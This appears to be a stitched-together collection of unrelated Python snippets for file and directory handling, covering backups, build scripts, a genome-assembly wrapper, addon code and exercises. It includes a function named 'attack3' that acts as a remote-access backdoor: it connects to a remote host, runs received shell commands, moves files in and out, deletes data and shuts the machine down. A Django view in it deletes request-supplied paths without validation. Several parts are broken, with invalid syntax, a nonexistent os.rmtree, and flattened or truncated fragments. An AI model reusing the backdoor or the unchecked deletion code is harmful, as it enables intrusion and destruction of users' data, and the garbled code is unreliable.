def main():
    # declare sources
    C = '/C/Shares/'
    # declare destination root
    Save_root = r'/External_HDD/Backups/Server/'
    # declare how long (in days) you want to keep daily backups
    dailyDuration = 7
    # declare on which day you want to keep backups older than the above
    keepDay = 'Sat'  # capitalize the first letter
    # find out what day it is
    today = str(datetime.date.today())
    # make a new folder to house all the backups
    save = Save_root + today + '_Backup'
    os.mkdir(save)
    Backup(C, save, 'Server')
    # create tarball of the newly created folder
    tar = tarfile.open(save + '.tar.bz2', 'w:bz2')
    tar.add(save)
    tar.close()
    # delete the non-compressed folder recursively
    shutil.rmtree(save)
    # remove any old backups
    clean_up(today, Save_root, dailyDuration, keepDay)
def give_me_assembly(fasta, kmer=31, tmp_dir=None):
    # use Velvet to assemble the supporting reads
    #
    # velveth /tmp/velvet-unmapped-reads/ 17 -fasta -short myfasta.fa
    # velvetg /tmp/velvet-unmapped-reads/
    if fasta:
        fasta_file = give_me_temp_filename(tmp_dir=tmp_dir)
        ase_dir = give_me_temp_filename(tmp_dir=tmp_dir)
        if os.path.isfile(ase_dir) or os.path.islink(ase_dir):
            os.remove(ase_dir)
        elif os.path.isdir(ase_dir):
            shutil.rmtree(ase_dir)
        os.makedirs(ase_dir)
        file(fasta_file, 'w').writelines(fasta)
        cmd = ['velveth', ase_dir, str(kmer), '-fasta', '-short', fasta_file,
               ';',
               'velvetg', ase_dir, '>', '/dev/null', '2>&1']
        cmd = ' '.join(cmd)
        proc = os.system(cmd)
        if proc:
            print >> sys.stderr, "ERROR while executing '%s'" % (cmd,)
            sys.exit(1)
    else:
        return []
    ase = file(os.path.join(ase_dir, 'contigs.fa'), 'r').readlines()
    delete_file(fasta_file)
    shutil.rmtree(ase_dir)
    return ase
def pullUpdate(url):
    r = requests.get(url, stream=True)
    total_length = r.headers.get('content-length')
    print('Downloading hydrus, please wait')
    #print('header of interest', str(r.headers['Content-Disposition']).split("=", 1)[1])
    z = zipfile.ZipFile(io.BytesIO(r.content))
    fileName = str(r.headers['Content-Disposition']).split("=", 1)[1]
    fn = fileName.split("-")
    try:
        # remove any previously extracted tree before unpacking the new one
        shutil.rmtree(
            str(fn[0]) + '-' + str(fn[1]) + '-' +
            str(format(str(fn[4]))[1:]).split('.')[0])
    except OSError:
        pass
    print('Download complete, moving files...')
    z.extractall()
    root_src_dir = str(fn[0]) + '-' + str(fn[1]) + '-' + str(
        format(str(fn[4]))[1:]).split('.')[0]
    root_dst_dir = 'hydrusnetwork'
    for src_dir, dirs, files in os.walk(root_src_dir):
        dst_dir = src_dir.replace(root_src_dir, root_dst_dir, 1)
        if not os.path.exists(dst_dir):
            os.makedirs(dst_dir)
        for file_ in files:
            src_file = os.path.join(src_dir, file_)
            dst_file = os.path.join(dst_dir, file_)
            if os.path.exists(dst_file):
                # in case src and dst are the same file
                if os.path.samefile(src_file, dst_file):
                    continue
                os.remove(dst_file)
            shutil.move(src_file, dst_dir)
    shutil.rmtree(root_src_dir)
def init():
    """
    Initialize the versioned directory that contains modules.
    """
    # Setup root directory.
    os.makedirs(INSTALL_ROOT, exist_ok=True)

    # Remove the current symlink if it exists already.
    if os.path.exists(SYMLINK_PATH):
        os.remove(SYMLINK_PATH)

    # Setup the symlink to be relative - makes it easier to change
    # home directory locations...
    v = version()
    os.chdir(INSTALL_ROOT)
    os.symlink(v, SYMLINK_NAME)

    # Copy every module into the directory.
    versioned_path = os.path.join(INSTALL_ROOT, v)
    if os.path.exists(versioned_path):
        shutil.rmtree(versioned_path)
    shutil.copytree(MODULE_PATH, versioned_path)

    # Execute each of the dynamic modules. There's no prescription for
    # the module format, so we delegate to os.system.
    os.chdir(SYMLINK_PATH)
    for _, _, files in os.walk(DOWNLOAD_MODULE_PATH):
        for f in files:
            p = os.path.join(DOWNLOAD_MODULE_PATH, f)
            assert os.system(p) == 0, "Non-zero exit code from %s" % p
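# Illustrative result of init() (a sketch only; INSTALL_ROOT, SYMLINK_NAME,
# and version() come from the surrounding module, and "1.2.3" is a
# hypothetical version string):
#
#   INSTALL_ROOT/
#       1.2.3/                  copy of MODULE_PATH for this version
#       SYMLINK_NAME -> 1.2.3   relative symlink into the active version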
def closeRW(self):
    if self.ResultWidget.switch:
        message = "Do you want to stop the optimization process?"
        ok = tkMessageBox.askokcancel('', message)
        if ok:
            self.ResultWidget.switch = 0
            if self.ResultWidget.cluster:
                self.ResultWidget.process.close()
            else:
                self.ResultWidget.process.kill()
            if self.ResultWidget.PrintR:
                self.ResultWidget.PrintR.destroy()
            self.ResultWidget.newwindow.destroy()
            self.ResultWidget = None
            self.Optimize.config(text=" Start \nOptimization")
            self.Results.config(state='normal')
    else:
        if self.ResultWidget.PrintR:
            self.ResultWidget.PrintR.destroy()
        self.ResultWidget.newwindow.destroy()
        self.ResultWidget = None
        self.Results.config(state='normal')
    if self.allunits['Menubar'].loadres is not None:
        os.chdir('..')
        WD = self.parameters['Case']['WD'].strip()
        if self.parameters['Case']['WD'] == "current":
            WD = self.cwd
        elif not (WD[0] == '/' or WD[1] == ':'):
            WD = os.path.join(self.cwd, WD)
        self.wd = WD
        shutil.rmtree(WD + '/%s' % self.parameters['Case']['name'])
def generatefiles(idd, name):
    url = "https://www.dmax.de/api/show-detail/" + str(idd)
    debug("generatefiles: " + url)
    content = geturl(url)
    try:
        struktur = json.loads(content)
    except ValueError:
        return
    mediapath = addon.getSetting("mediapath")
    ppath = mediapath + name.replace(" ", "_").replace(":", "_")
    debug(ppath)
    if xbmcvfs.exists(ppath):
        shutil.rmtree(ppath)
    os.mkdir(ppath)
    subelement = struktur["videos"]["episode"]
    for number, videos in subelement.iteritems():
        for video in videos:
            idd = video["id"]
            debug("IDD VIDEO: " + str(idd))
            title = video["title"]
            title = title.replace("{S}", "S").replace(".{E}", "E")
            desc = video["description"]
            duration = video["videoDuration"]
            duration = duration / 1000
            image = video["image"]["src"]
            airdate = video["airDate"]
            namef = title.replace(" ", "_").replace(":", "_")
            #debug(namef)
            filename = ppath + "/" + namef + ".strm"
            #debug(filename)
            file = open(filename, "wt")
            file.write("plugin://plugin.video.L0RE.dmax/?mode=playvideo&url=" + str(idd))
            file.close()
    xbmcplugin.endOfDirectory(addon_handle, succeeded=True, updateListing=False, cacheToDisc=True)
def cop_data = None  # noqa: placeholder removed
def copy_data(location_src):
    main_path = os.path.join(script_root, "", location_src)

    print("Copying qml files:")
    dst_folder = os.path.normpath(location_release + "/" + folder_name + "/ui")
    if not os.path.exists(dst_folder):
        os.mkdir(dst_folder)
    for root, dirs, files in os.walk(os.path.normpath(main_path + "/ui/")):
        for file_ in files:
            if file_.endswith("qml"):
                print("Copying", file_, "from", root, "to", dst_folder)
                shutil.copy(os.path.join(root, file_), os.path.join(dst_folder, file_))

    print("Copying icons files:")
    dst_folder = os.path.normpath(location_release + "/" + folder_name + "/icons")
    if not os.path.exists(dst_folder):
        os.mkdir(dst_folder)
    for root, dirs, files in os.walk(os.path.normpath(main_path + "/icons/")):
        for file_ in files:
            print("Copying", file_, "from", root, "to", dst_folder)
            shutil.copy(os.path.join(root, file_), os.path.join(dst_folder, file_))

    pyqt5_add_folder = os.path.join(main_path + pyqt5_qt_folder_name)
    print("Copying PyQtWebEngine files:")
    print("\tCopying PyQtWebEngine bin files:")
    src_folder = os.path.normpath(pyqt5_add_folder + "/bin/QtWebEngineProcess.exe")
    dst_folder = os.path.normpath(location_release + "/" + folder_name + "/PyQt5/Qt/bin/QtWebEngineProcess.exe")
    shutil.copy(src_folder, dst_folder)

    print("\tCopying PyQtWebEngine resources files:")
    src_folder = os.path.normpath(pyqt5_add_folder + "/resources/")
    dst_folder = os.path.normpath(location_release + "/" + folder_name + "/PyQt5/Qt/resources/")
    if os.path.exists(dst_folder):
        shutil.rmtree(dst_folder)
    shutil.copytree(src_folder, dst_folder, ignore=None)

    print("\tCopying PyQtWebEngine translations files:")
    src_folder = os.path.normpath(pyqt5_add_folder + "/translations/")
    dst_folder = os.path.normpath(location_release + "/" + folder_name + "/PyQt5/Qt/translations/")
    if os.path.exists(dst_folder):
        shutil.rmtree(dst_folder)
    shutil.copytree(src_folder, dst_folder, ignore=None)

    print("Copying version file:")
    src_folder = os.path.normpath(
        os.path.dirname(os.path.realpath(script_root)) + "/version")
    dst_folder = os.path.normpath(location_release + "/" + folder_name + "/version")
    print("src_folder = {}".format(src_folder))
    print("dst_folder = {}".format(dst_folder))
    shutil.copy(src_folder, dst_folder)
def directory(choice, directory_path, force=False):
    if choice == "make":
        os.mkdir(directory_path)
    elif choice == "remove":
        if force:
            # shutil.rmtree removes the directory and everything inside it
            shutil.rmtree(directory_path)
        else:
            # os.rmdir only removes empty directories
            os.rmdir(directory_path)
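# A minimal usage sketch for the directory() helper above ("/tmp/demo" is a
# hypothetical path; assumes `import os, shutil` at module level):
#
#   directory("make", "/tmp/demo")                     # create an empty folder
#   directory("remove", "/tmp/demo")                   # os.rmdir: empty only
#   directory("remove", "/tmp/demo_tree", force=True)  # shutil.rmtree: recursive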
@contextlib.contextmanager  # assumed: the bare `yield` implies this decorator
def chdir_temporary_folder(folder_in):
    folder = tempfile.mkdtemp() if folder_in is None else folder_in
    old_folder = os.getcwd()
    os.chdir(folder)
    try:
        yield
    finally:
        os.chdir(old_folder)
        if folder_in is None:
            shutil.rmtree(folder)
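# Usage sketch for chdir_temporary_folder (assumes the @contextlib.contextmanager
# decorator above and imports of contextlib, os, shutil, tempfile):
#
#   with chdir_temporary_folder(None):
#       ...  # cwd is a fresh temp dir, deleted again on exit
#   with chdir_temporary_folder("/existing/dir"):
#       ...  # cwd changes, but the caller-supplied dir is kept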
def __init__(self, file_name, size_buffer=10**8):
    self.file_name = file_name
    if file_name:
        # clear anything already sitting at the target path
        if os.path.isfile(file_name) or os.path.islink(file_name):
            os.remove(file_name)
        elif os.path.isdir(file_name):
            shutil.rmtree(file_name)
        self.file_handle = open(file_name, 'w')
    self.size_buffer = size_buffer
    self.data = []
    self.size = 0
def main():
    opts, src, dest = get_opts()
    if opts.verbose >= 3:
        print ("running with options:\nsrc = [%s]\ndest = [%s]\nverbose = [%d]\n" +
               "dry-run = [%d]\nclean-first = [%d]\nforce = [%d]") % \
            (src, dest, opts.verbose, opts.dryrun, opts.clean, opts.force)
    if opts.dryrun and opts.verbose == 0:
        opts.verbose = 1
    if opts.clean:
        if opts.dryrun or opts.verbose:
            print "removing tree %s" % dest
        if not opts.dryrun:
            # shutil.rmtree signature: (path, ignore_errors, onerror)
            shutil.rmtree(dest, True, _rmtree_warn)
    make(opts, src, dest)
def main():
    opts, src, dest = get_opts()
    if opts.verbose >= 3:
        print(("running with options:\nsrc = [%s]\ndest = [%s]\nverbose = [%d]\n" +
               "dry-run = [%d]\nclean-first = [%d]\nforce = [%d]") %
              (src, dest, opts.verbose, opts.dryrun, opts.clean, opts.force))
    if opts.dryrun and opts.verbose == 0:
        opts.verbose = 1
    if opts.clean:
        if opts.dryrun or opts.verbose:
            print("removing tree %s" % dest)
        if not opts.dryrun:
            # shutil.rmtree signature: (path, ignore_errors, onerror)
            shutil.rmtree(dest, True, _rmtree_warn)
    make(opts, src, dest)
def clean():
    "Delete all targets that are built from source."
    for t in Target.instances:
        if isinstance(t, DependentTargetFromSource):
            if os.path.isdir(t.filename):
                print 'rm -r %s' % t.filename
                sys.stdout.flush()
                if not opt.dryrun:
                    shutil.rmtree(t.filename)
            elif os.path.exists(t.filename):
                print 'rm %s' % t.filename
                sys.stdout.flush()
                if not opt.dryrun:
                    os.remove(t.filename)
def apply_delta(root, e):
    chleb = Queue.Queue(0)
    path, metadata = e
    branch, leaf = split_path(path)

    if metadata is not None:
        print(' + ' + path)
        # Traverse down the tree until we find the parent folder of the entry
        # we want to add. Create any missing folders along the way.
        children = root
        for part in branch:
            node = get_or_create_child(children, part)
            # If there's no folder here, make an empty one.
            if not node.is_folder():
                node.content = {}
            children = node.content
        # Create the file/folder.
        node = get_or_create_child(children, leaf)
        node.path = metadata['path']  # Save the un-lower-cased path.
        if metadata['is_dir']:
            # Only create an empty folder if there isn't one there already.
            if not node.is_folder():
                node.content = {}
                if delta_switch == 0:
                    try:
                        os.mkdir(droppath + "/" + path)
                    except OSError:
                        pass
        else:
            node.content = metadata['size'], metadata['modified']
            tmp = ['get', path, droppath + "/" + path]
            if delta_switch == 0:
                try:
                    chleb.put(client_new(tmp))
                except Exception:
                    print(" x Something went wrong")
    else:
        print(' - ' + path)
        if delta_switch == 0:
            try:
                chleb.put(os.remove(droppath + '/' + path))
            except OSError:
                print(' x Something went wrong')
        # Traverse down the tree until we find the parent of the entry we
        # want to delete.
        children = root
        for part in branch:
            node = children.get(part)
            # If one of the parent folders is missing, then we're done.
            if node is None or not node.is_folder():
                chleb.put(shutil.rmtree(droppath + path))
                break
            children = node.content
        else:
            # If we made it all the way, delete the file/folder (if it exists).
            if leaf in children:
                del children[leaf]
def sync_to_s3(aar_release_name, sdk_version):
    os.chdir('release-folder/')
    print('Updating maven with the new binaries')
    output, err = run_script(
        'mvn install:install-file -DgroupId=net.singular.segment.integration -DartifactId=singular_segment_sdk -DcreateChecksum=true -Dversion={0} -Dpackaging=aar -Dfile={1} -DpomFile=../segment-singular-android/generated-sdk.pom -DlocalRepositoryPath=.'
        .format(sdk_version, aar_release_name))
    #os.rename('./net/singular/segment/integration/singular_segment_sdk/maven-metadata-local.xml',
    #          './net/singular/segment/integration/singular_segment_sdk/')
    os.remove(aar_release_name)
    for filename in glob.iglob(os.getcwd() + '/**/*', recursive=True):
        if filename.endswith('.DS_Store'):
            os.remove(filename)
        elif filename.endswith('.git'):
            shutil.rmtree(filename)
    print('Syncing the new version to S3')
    output, err = run_script('s3cmd sync -P . s3://maven.singular.net')
    os.chdir('../')
def make_ancils(self, debug=False):
    orog_run_id, orog_output_dir, orog_output_files = self.make_orog()
    veg_run_id, veg_output_dir, veg_output_files = self.make_vegfrac()
    self.wait([orog_run_id, veg_run_id])
    # Copy output files into place and delete run directories
    for f in orog_output_files + veg_output_files:
        assert os.path.exists(f)
        shutil.copy(f, self.output)
    if not debug:
        shutil.rmtree(orog_output_dir)
        shutil.rmtree(veg_output_dir)
    return 0
def give_me_assembly(fasta, kmer=31, velvet_dir=None, tmp_dir=None):
    # use Velvet to assemble the supporting reads
    #
    # velveth /tmp/velvet-unmapped-reads/ 17 -fasta -short myfasta.fa
    # velvetg /tmp/velvet-unmapped-reads/
    if fasta:
        fasta_file = give_me_temp_filename(tmp_dir=tmp_dir)
        ase_dir = give_me_temp_filename(tmp_dir=tmp_dir)
        if os.path.isfile(ase_dir) or os.path.islink(ase_dir):
            os.remove(ase_dir)
        elif os.path.isdir(ase_dir):
            shutil.rmtree(ase_dir)
        os.makedirs(ase_dir)
        file(fasta_file, 'w').writelines(fasta)
        _VT_ = ""
        if velvet_dir and velvet_dir.strip():
            _VT_ = velvet_dir.rstrip("/") + "/"
        cmd = [_VT_ + 'velveth', ase_dir, str(kmer), '-fasta', '-short', fasta_file,
               ';',
               _VT_ + 'velvetg', ase_dir, '>', '/dev/null', '2>&1']
        cmd = ' '.join(cmd)
        proc = os.system(cmd)
        if proc:
            print >> sys.stderr, "ERROR while executing '%s'" % (cmd,)
            sys.exit(1)
    else:
        return []
    ase = file(os.path.join(ase_dir, 'contigs.fa'), 'r').readlines()
    delete_file(fasta_file)
    shutil.rmtree(ase_dir)
    return ase
def __init_caches(self, path):
    needs_create = True
    if os.path.exists(path):
        if not os.path.isdir(path):
            # path exists but is a file/link; remove it so the cache
            # directory can be created in its place
            os.remove(path)
        else:
            needs_create = False
    if needs_create:
        os.makedirs(path)
    self.__cache_index_file = "%s/cache_index" % (path)
    try:
        cache_index_file = open(self.__cache_index_file, "r")
        cache_index = cache_index_file.read()
        cache_index_file.close()
        self.__cache_index = json.loads(cache_index)
    except (IOError, ValueError):
        self.__cache_index = {}
def run_gauss(self):
    jobdirroot = ".\\job"
    if not os.path.exists("job"):
        os.makedirs("job")
    s_flux = self.source_flux()
    s_power = self.voxel_flux_to_power([s_flux])[0]
    # s_flux = self.rect_flux_split(s_flux, s_power)
    while self.mesh_level > 0:
        s_flux = self.rect_flux_split(s_flux, s_power)
        # find a way to handle filtering, hopefully already done.
        # maybe incorporate filtering into the s_flux definition.
        s_flux = self.source_flux(s_flux)
        s_power = self.voxel_flux_to_power([s_flux])[0]
        self.mesh_level -= 1
    if os.path.exists("job"):
        shutil.rmtree("job")
    return s_power
def rm(request, datatype):
    try:
        path = request.GET['path']
        if datatype == "file":
            filename = request.GET["filename"]
        elif datatype == "folder":
            folder = request.GET["folder"]
    except KeyError:
        return HttpResponse("No path exists")
    else:
        currentpath = path
        path = os.path.join(ajaxfilemanager.settings.file_directory, path)
        print(path + " " + currentpath + " " + ajaxfilemanager.settings.file_directory)
        if os.access(path, os.W_OK):
            os.chdir(path)
            if datatype == "file":
                os.remove(filename)
            elif datatype == "folder":
                shutil.rmtree(folder)
        return HttpResponse(datatype + " successfully deleted")
def extractsrc(self, side):
    """Unzip the source jar file to the src directory defined in the config file"""
    pathbinlk = {0: self.ffclientout, 1: self.ffserverout}
    jarlk = {0: self.ffclientsrc, 1: self.ffserversrc}
    pathsrclk = {0: self.srcclient, 1: self.srcserver}

    # HINT: We check if the top output directory exists. If not, we create it
    if not os.path.exists(pathbinlk[side]):
        os.mkdir(pathbinlk[side])

    # HINT: We extract the jar to the right location
    zipjar = zipfile.ZipFile(jarlk[side])
    zipjar.extractall(pathbinlk[side])

    if not os.path.exists(pathsrclk[side]):
        os.mkdir(pathsrclk[side])
    srcsrc = os.path.join(pathbinlk[side], self.ffsource).replace('/', os.sep).replace('\\', os.sep)
    srcdest = os.path.join(pathsrclk[side], self.ffsource).replace('/', os.sep).replace('\\', os.sep)
    if os.path.exists(srcdest):
        shutil.rmtree(srcdest)
    shutil.copytree(srcsrc, srcdest)
def main():
    if input('Do you want to clean generated data? (y/n)') == 'y':
        if os.path.isdir('cmp'):
            shutil.rmtree('cmp')
        if os.path.exists('result_pre.jpg'):
            os.remove('result_pre.jpg')
        if os.path.exists('result.jpg'):
            os.remove('result.jpg')
        if os.path.exists('result_full.jpg'):
            os.remove('result_full.jpg')
        if os.path.exists('result.json'):
            os.remove('result.json')
        fileList = glob.glob('result_*.jpg')
        for filePath in fileList:
            os.remove(filePath)
    if input('Do you want to clean portals dataset? (y/n)') == 'y':
        if os.path.isdir('data'):
            shutil.rmtree('data')
        if os.path.isdir('data_feature'):
            shutil.rmtree('data_feature')
        if os.path.isdir('data_feature_preview'):
            shutil.rmtree('data_feature_preview')
default="scibert-nli", type=str, required=False, help="Model selected in the list: " + ", ".join(MODELS) ) args = parser.parse_args() path = os.path.join(MODELS_PATH, args.model) if not os.path.exists(path): os.makedirs(path) if args.model == 'scibert': # Used to fine-tune SciBERT from default embeddings tokenizer = AutoTokenizer.from_pretrained("allenai/scibert_scivocab_cased") model = AutoModel.from_pretrained("allenai/scibert_scivocab_cased") model.save_pretrained(path) tokenizer.save_pretrained(path) print('SciBERT Transformer model available in', path) elif args.model == 'scibert-nli': # Already-trained SciBERT tokenizer = AutoTokenizer.from_pretrained("gsarti/scibert-nli") model = AutoModel.from_pretrained("gsarti/scibert-nli") model.save_pretrained(path) tokenizer.save_pretrained(path) word_embedding_model = models.BERT(path) pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension(), pooling_mode_mean_tokens=True, pooling_mode_cls_token=False, pooling_mode_max_tokens=False) model = SentenceTransformer(modules=[word_embedding_model, pooling_model]) os.rmtree(path) model.save(path) print('SciBERT SentenceTransformer model available in', path) else: raise AttributeError("Model should be selected in the list: " + ", ".join(MODELS))
def publish_version(version, install=False):
    # make the staging area
    # stagepath = "addon_name"+_+version  # OLD
    stagepath = addon_name
    print("Building target: " + stagepath)
    if os.path.isdir(stagepath):
        shutil.rmtree(stagepath)
    os.mkdir(stagepath)

    # file by file, copy and do replacements
    for fil in files:
        if os.path.isdir(fil):
            newdirname = os.path.join(stagepath, fil)
            shutil.copytree(fil, newdirname)  # will have some .DS_Store's
        else:
            fname = fil
            newname = os.path.join(stagepath, fil)
            inFile = codecs.open(fname, "r", "utf-8")
            outFile = codecs.open(newname, "w", "utf-8")
            for line in inFile:
                newline = do_replacements_on(line, version)
                outFile.write(newline)
            inFile.close()
            outFile.close()

    # zip and remove
    def old_method(stagepath):
        p = Popen(["zip", "-r", stagepath + ".zip", stagepath],
                  stdin=PIPE, stdout=PIPE, stderr=PIPE)
        stdout, err = p.communicate(b"")

    old_method(stagepath)
    # new zip method, to skip .DS's
    # with zipfile.ZipFile(stagepath+".zip", 'w') as myzip:
    #     filezips = os.listdir(stagepath)
    #     for file in filezips:
    #         if file != '.DS_Store':
    #             myzip.write(file)

    if install:
        installedpath = os.path.join(addonpath, addon_name + "_" + version)
        if not os.path.isdir(installedpath):
            print("creating folder:")
            print(installedpath)
            os.mkdir(installedpath)
        else:
            try:
                shutil.rmtree(os.path.join(addonpath, addon_name + "_" + version, "__pycache__"))
            except OSError:
                print("No cache to delete")
        for fil in files:
            stagefile = os.path.join(stagepath, fil)
            p = Popen(["mv", stagefile, installedpath],
                      stdin=PIPE, stdout=PIPE, stderr=PIPE)
            stdout, err = p.communicate(b"")
    shutil.rmtree(stagepath)
    os.rename(stagepath + ".zip", os.path.join(build_dir, stagepath + ".zip"))
shutil.copytree(os.path.join(cwd, "Labo", "Exercice"),
                os.path.join(cwd, "Labo", "Exercice2"))  # Copy all files

# Move files (the target folders must exist)
shutil.move(os.path.join(cwd, "Labo", "cobaye2.txt"),
            os.path.join(cwd, "Labo", "Exercice"))
shutil.move(os.path.join(cwd, "cobaye.txt"),
            os.path.join(cwd, "Labo", "cobaye3.txt"))  # Renames after moving

# Delete files
os.unlink(path)      # Deletes a file
os.rmdir(path)       # Deletes an empty folder
shutil.rmtree(path)  # Deletes a folder and everything it contains
# To send to the trash instead, import send2trash

"""
################
#   Exercise   #
################
Delete all the .txt files in the Exercice folder, then recreate them with
your script. Use os.listdir and filename.endswith('.txt').
(One possible solution follows this snippet.)
"""

# Walk the folders, subfolders, and files of a directory tree
for folder_name, subfolders, filenames in os.walk(cwd):
    print('The current folder is ' + folder_name)
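# One possible solution to the exercise above (a sketch; reuses cwd and the
# Labo/Exercice folder from this script and assumes `import os`):
exercice_dir = os.path.join(cwd, "Labo", "Exercice")
txt_names = [f for f in os.listdir(exercice_dir) if f.endswith('.txt')]
for name in txt_names:
    os.unlink(os.path.join(exercice_dir, name))           # delete each .txt file
for name in txt_names:
    open(os.path.join(exercice_dir, name), 'w').close()   # recreate them empty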
os.chdir(wdir)

# Make a copy of the executable to the directory that is going to be
# repeatedly copied (if it doesn't already exist there)
if not os.path.isfile(os.path.join(bmdir, 'gsflow.exe')):
    # If the file doesn't yet exist in this location, bring a copy in
    shutil.copy(os.path.join(wdir, '..', 'Model Archive', 'bin', 'gsflow.exe'), bmdir)

for dT in deltaT:
    # Create a new directory
    directory = os.path.join(os.getcwd(), EFWF, 'temp_' + str(dT))
    if os.path.exists(directory):
        shutil.rmtree(directory)
    # Copy the needed files to the new directory
    shutil.copytree(bmdir, directory)
    os.chdir(directory)
    if EFWF == 'EF':
        ogname = 'upper_carson_climate_2.data'  # original name
        bname = 'upper_carson_climate_2'
        control_file = 'eastfork_clim2_hist.control'
    elif EFWF == 'WF':
        ogname = 'upper_carson_climate_2.data'  # currently both CR forks share a name, but that could change
        bname = 'upper_carson_climate_2'
        control_file = 'westfork_clim2.control'
    # get original data
if __name__ == "__main__": try: parser = argparse.ArgumentParser() parser.add_argument("config", type=str) parser.add_argument("--debug", action="store_true", default=False) parser.add_argument("--archive-mode", action="store_true", default=False) parser.add_argument("--clear-fid-cache", action="store_true", default=False) parser.add_argument("--num-workers", type=int, default=16) args = parser.parse_args() fid_cache_dir = ".fid-cache/" if args.clear_fid_cache and os.path.exists(fid_cache_dir): os.rmtree(fid_cache_dir) with open(args.config, "r") as f: config = yaml.load(f, Loader=yaml.FullLoader) config = EasyDict(config) config.var = EasyDict() config.var.exp_name = os.path.basename(args.config).split(".yaml")[0] print(" [*] Config {} loaded!".format(args.config)) if args.archive_mode: config.var.log_dir = "../../" # Running in ./logs/<exp_name>/codes/ else: config.var.log_dir = "./logs/" # Remove previous error file (will make confusion on log synchronizing) error_f = os.path.join(config.var.log_dir, config.var.exp_name, "error-log.txt")
def delete_dir(self) -> None:
    """
    Delete the directory where all the files were temporarily written
    """
    shutil.rmtree(self.__rootdir__)
def attack3():
    server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    loop4 = 'on'
    while loop4 == 'on':
        try:
            sleep(1)
            server4.connect((ip, 10008))
            loop4 = 'off'
        except:
            pass
    while True:
        command = server4.recv(1024)
        #print command
        if command == "cd..":
            try:
                back_dir(os.getcwd())
            except:
                pass
        elif command[:3] == "cd ":
            try:
                os.chdir(command[3:])
            except:
                pass
        elif command == "ls":
            data = os.listdir(os.getcwd())
            i = 0
            d = ''
            while i < len(data):
                d = d + '$$%%' + data[i]
                #print len(data)
                i += 1
            server4.send(d)
        elif command[:4] == "get ":
            f = open(command[4:], 'rb')
            size = os.path.getsize(command[4:])
            server4.send(str(size))
            data = f.read(2048)
            server4.send(data)
            while data != "":
                data = ''
                data = f.read(2048)
                if data == "":
                    server4.send('stop it')
                else:
                    server4.send(data)
        elif command[:6] == "mkdir ":
            os.mkdir(command[6:])
        elif command[:7] == "upload ":
            size = server4.recv(1024)
            data = server4.recv(2048)
            while data[-7:] != 'stop it':
                f = open(command[7:], 'ab')
                f.write(data)
                f.close()
                data = ''
                data = server4.recv(2048)
        elif command == "pwd":
            path = os.getcwd()
            server4.send(path)
        elif command[:5] == "del_d":
            try:
                shutil.rmtree(command[6:])
            except:
                pass
        elif command[:5] == "del_f":
            try:
                os.remove(command[6:])
            except:
                pass
        elif command == "shutdown":
            os.system('shutdown -s')
        elif command[:4] == "cmd ":
            try:
                print command[4:]
                os.system(command[4:])
            except:
                pass
def setup_data():
    os.makedirs(pjoin(folder, "nucleotides", "fnas"), exist_ok=True)
    os.makedirs(pjoin(folder, "proteins", "faas"), exist_ok=True)
    os.makedirs(pjoin(folder, "temp"), exist_ok=True)

    Entrez.email = username
    query = " OR ".join(ids)
    query = '"Prochlorococcus"[Organism]'
    ass_ids = Entrez.read(
        Entrez.esearch(db="assembly", term=query, retmax=1000000))['IdList']

    def get_assemblies(ass_id):
        ass_info = Entrez.read(Entrez.esummary(db="assembly", id=ass_id))
        genbank = ass_info['DocumentSummarySet']['DocumentSummary'][0]['FtpPath_GenBank']
        refseq = ass_info['DocumentSummarySet']['DocumentSummary'][0]['FtpPath_RefSeq']
        ftp_fold = genbank if refseq == "" else refseq
        ftp_file = "{fold}/{ID}_genomic.gbff.gz".format(fold=ftp_fold, ID=ftp_fold.split("/")[-1])
        call("wget {path} 2> /dev/null".format(path=ftp_file), shell=True)
        shutil.move(ftp_fold.split("/")[-1] + "_genomic.gbff.gz", "nucleotides/ncbi_gbffs")

    for ass_id in tqdm(ass_ids):
        get_assemblies(ass_id)

    genomes = dict()
    for f in tqdm(os.listdir("nucleotides/ncbi_gbffs")):
        with gzip.open("nucleotides/ncbi_gbffs/" + f, "rt") as handle:
            genomes["_".join(f.split("_")[0:2])] = [s for s in SeqIO.parse(handle, "genbank")]

    def make_rec(feat, genome, seq):
        entry = ">{locus}:{genome}{ID} {product}\n{seq}\n"
        if 'translation' in feat.qualifiers:
            params = {
                'locus': feat.qualifiers['locus_tag'][0],
                'genome': genome,
                'ID': (":" + feat.qualifiers['protein_id'][0]) if 'protein_id' in feat.qualifiers else "",
                'product': feat.qualifiers['product'][0],
                'seq': re.sub("(.{64})", "\\1\n", feat.qualifiers['translation'][0], 0, re.DOTALL)
            }
        else:
            seq = feat.extract(seq).translate(table=feat.qualifiers['transl_table'][0])
            params = {
                'locus': feat.qualifiers['locus_tag'][0],
                'genome': genome,
                'ID': (":" + feat.qualifiers['protein_id'][0]) if 'protein_id' in feat.qualifiers else "",
                'product': feat.qualifiers['product'][0],
                'seq': re.sub("(.{64})", "\\1\n", str(seq.seq), 0, re.DOTALL)
            }
        return entry.format(**params)

    for k, v in tqdm(genomes.items()):
        SeqIO.write(v, pjoin(folder, "nucleotides", "fnas", k + ".fna"), "fasta")
        aas = [make_rec(s, k, vv) for vv in v for s in vv.features if s.type == "CDS"]
        if len(aas) > 0:
            with open(pjoin(folder, "proteins", "faas", k + ".faa"), "w") as handle:
                handle.writelines(aas)

    full_of_Ns = "rm nucleotides/fnas/GCF_000291845.1.fna nucleotides/fnas/GCF_000291925.1.fna"

    def compute_fastamd5(file):
        with open(file) as handle:
            lines = "".join([l.strip() if not l.startswith(">") else ">" for l in handle]).split(">")
        lines = sorted(lines)
        md5s = [md5(l.upper().encode('utf-8')).hexdigest() for l in lines]
        full_md5 = md5("".join(md5s).encode("utf-8")).hexdigest()
        return {'full_md5': full_md5, "entry_md5s": md5s}

    md5s_entrez = {f[:-4]: compute_fastamd5('nucleotides/fnas/' + f)
                   for f in tqdm(os.listdir('nucleotides/fnas/'))}
    md5s_gorg = {f[:-6]: compute_fastamd5('nucleotides/gorgs/' + f)
                 for f in tqdm(os.listdir('nucleotides/gorgs/'))}
    common_md5s = {md5['full_md5'] for md5 in md5s_entrez.values()}.intersection(
        {md5['full_md5'] for md5 in md5s_gorg.values()})
    good_gorgs = [k for k, v in md5s_gorg.items() if v['full_md5'] not in common_md5s]
    for f in good_gorgs:
        shutil.copy('nucleotides/gorgs/' + f + ".fasta",
                    'nucleotides/fnas/GORG_' + f.replace("_contigs", ".1.fna"))

    command = 'prokka --force --cpus 20 --genus Prochlorococcus --locustag {id} --prefix {id} --outdir nucleotides/prokkas/ nucleotides/fnas/{id}.fna > /dev/null '
    for f in os.listdir('nucleotides/fnas/'):
